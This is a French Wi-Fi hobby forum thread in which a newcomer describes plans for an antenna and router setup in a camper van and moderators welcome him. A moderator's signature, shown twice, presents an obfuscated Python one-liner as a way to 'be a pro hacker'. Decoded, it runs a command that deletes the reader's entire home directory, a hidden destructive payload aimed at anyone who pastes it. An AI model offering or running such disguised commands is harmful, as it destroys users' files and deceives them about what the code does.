Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-03-2012 20:16:43

HK#7777
N00b
Lieu : Toulouse

HK#7777

Bonjour a toute la communauté !

je me présente pour mon premier message, jeune adulte qui se prépare a une vie nomade dans un fourgon avec sa petite famille, en pleins travaux d'aménagement.
J'ai des notion d'informatique lambda, mais je sais d'expérience qu'avec du temps et beaucoup de lecture on peut acquérir beaucoup de savoir dans les forums et leur membres.

la raison de mon inscription a crackwifi, est de réussir a monter une installation wifi dans le fourgon pour pouvoir profiter du plus grand nombre de spots wifi que je pourais trouver sur la route de mes vacance.

Je vais donc parcourir ce forum et glaner un Max d'infos pour déterminer le matériel et les configuration nécessaire a plusieurs objectifs:
1- une antenne pouvant accrocher un réseau qui peut être éloigner ou faible.
2- une petite tablette tactile style asus transformer pour piloter l'antenne
3- essayer de fabriquer un petit réseau local autour du fourgon pour pouvoir connecter nos appareils mobile ( une sorte de relais wifi en sorte ? )
4- envisager la possibilité d'augmenter le réseau de tel mobile dans les endrois reculé
5- envisager une solution de réseau wifi local depuis un abonnement internet mobile ( en lien avec "4" )
6- dimensionner l'equipement global a un réseau 12 volt et avec les contrainte relatifs a une installation dans un véhicule ( chaleur, froid, vibration, humidité, discrétion )

me voici prêt a dévorer des nombreux sujets, une fois le matériel choisis, et le plan d'installation établis je vous ferais part des résultats de mes recherche. Pour peut être me corrigé ( et il y aura matière a pourir du noob a mon avis ^^ )

en vous remerciant de votre acceuil.

projet d'antenne wifi mobile intégrée dans un fourgon aménagé a l'étude, pour se brancher le plus souvent possible a la toile !

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 29-03-2012 18:14:50

M1ck3y
Administrateur
Lieu : Lost in the darkness

Re : HK#7777

Bienvenue chez nous HK#7777 smile

Ton projet m'a l'air bien sympa, tu as énormément de ressources sur le forum, il te faut prendre le temps de chercher et de lire. Tiens nous au courant de l'avancement du projet smile

#3 29-03-2012 20:43:26

spawn
Modérateur

Bienvenue !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 29-03-2012 21:56:22

HK#7777
N00b

yep merci a vous ! comme je part de loin niveaux connaissance des réseaux wifi je suis d'abord dans l'évaluation du câblage a tirer et des trous d'emplacement pour l'aménagement. j'installerais le matos plus tard.
pour l'instant je part sur une antenne sectoriel bien puissante avec la carte wifi qui dépote, et derrière ça ce serais bien si je pouvais coupler un répétiteur de wifi. De façon a reproduire des réseaux wifi se trouvant plus loin, autour du fourgon. Apparemment il faut un ordi pour piloter la carte wifi et son antenne, ce serais bien si je pouvais m'en passer.
ensuite un micro-répéteur 3G ( c'est plutôt cher ça :€ ) et le mobile androïde transformer en routeur wifi pour y connecter le PC .

voilà voilà .

projet d'antenne wifi mobile intégrée dans un fourgon aménagé a l'étude, pour se brancher le plus souvent possible a la toile !

#5 30-03-2012 07:02:27

spawn
Modérateur

Ca reste ton post de présentation, mais je pense qu'un routeur à 40€ est une bonne solution. Pas besoin de PC. N'hésite pas à créer un post pour parler de ton projet !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#6 30-03-2012 09:21:51

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Bonjour HK#7777! Bienvenue parmi nous! smile
Un projet et une présentation vraiment sympa!
N´hésite pas à ouvrir un sujet et si tu as le temps, l'envie et l'appareil photo; pourquoi pas l'achalander de quelques photos?  On pourrait voir l'évolution du projet jusqu'à sa concrétisation. Ça ferait un beau thread.
Dans tous les cas bonne chance pour la confection de ta roulotte numérique et bon vent sur les routes! smile

#7 30-03-2012 14:06:25

HK#7777
N00b

merci pour l'accueil , il est vrais que je sort de la simple présentation, je ferais un sujet dédier quand j'aurai suffisamment avancer dessus pour le soumettre a votre savoir, et le mètre a l'epreuve de votre analyse pour pouvoir valider la réalisation.
le résultat sera rédiger avec les fotos des travaux.
a bientôt smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]